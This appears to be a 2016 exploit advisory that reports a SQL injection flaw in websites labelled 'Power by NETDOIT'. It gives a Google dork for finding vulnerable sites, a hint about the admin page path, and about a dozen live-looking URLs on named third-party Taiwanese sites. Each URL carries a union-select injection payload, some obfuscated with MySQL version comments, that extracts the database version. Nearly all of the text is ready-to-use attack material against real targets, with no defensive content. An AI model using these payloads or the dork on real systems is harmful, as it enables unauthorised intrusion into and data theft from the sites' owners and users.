######################
# Exploit Title : Power by NETDOIT SQL injection Vulnerability
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://web.net-doit.com/
# Google Dork : intext:"Power by NETDOIT" news_detail.php?id=
# Date: 2016 22 October
# Tested On : Win 10 / Google Chrome / Mozilla Firefox
#
######################
# admin page : target/a/ or /m/
# demos :
# http://www.dcbox.com.tw/mobile/news_detail.html?id=-107+union+select+version(),2,3
# http://iweb11.ieshop.tw/mobile/news_detail.html?id=-82+union+select+version(),2,3
# http://www.ieshop.tw/mobile/news_detail.html?id=-81+union+select+version(),2,3
# http://www.29648834.com/news_detail.php?id=-84+/*!50000union*/+select+version(),2
# http://www.haoda.com.tw/news_detail.php?id=-75+/*!50000union*/+select+version(),2
# http://iweb49.ieshop.tw/news_detail.html?id=-81+union+select+1,version(),3,4,5,6,7,8,9,10,11--%20-
# http://www.jiayin.com.tw/news_detail.php?id=-73+/*!50000union*/+select+version(),2
# http://www.mingjiann.com.tw/news_detail.php?id=-68+/*!50000union*/+select+1,version(),3,4,5,6,7,8,9,10,11,12,13
# http://www.bon-tech.com.tw/news_detail.php?id=-84+/*!50000union*/+select+version(),2
# http://www.s2r.com.tw/news_detail.php?id=-14+UNION+SELECT+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--%20-
# http://www.master-new.com.tw/news_detail.php?id=-73+/*!50000union*/+select+version(),2
# http://www.jialung.com.tw/en/news_detail.php?id=-12+/*!50000union*/+select+version(),2
######################
# discovered by : modiret
######################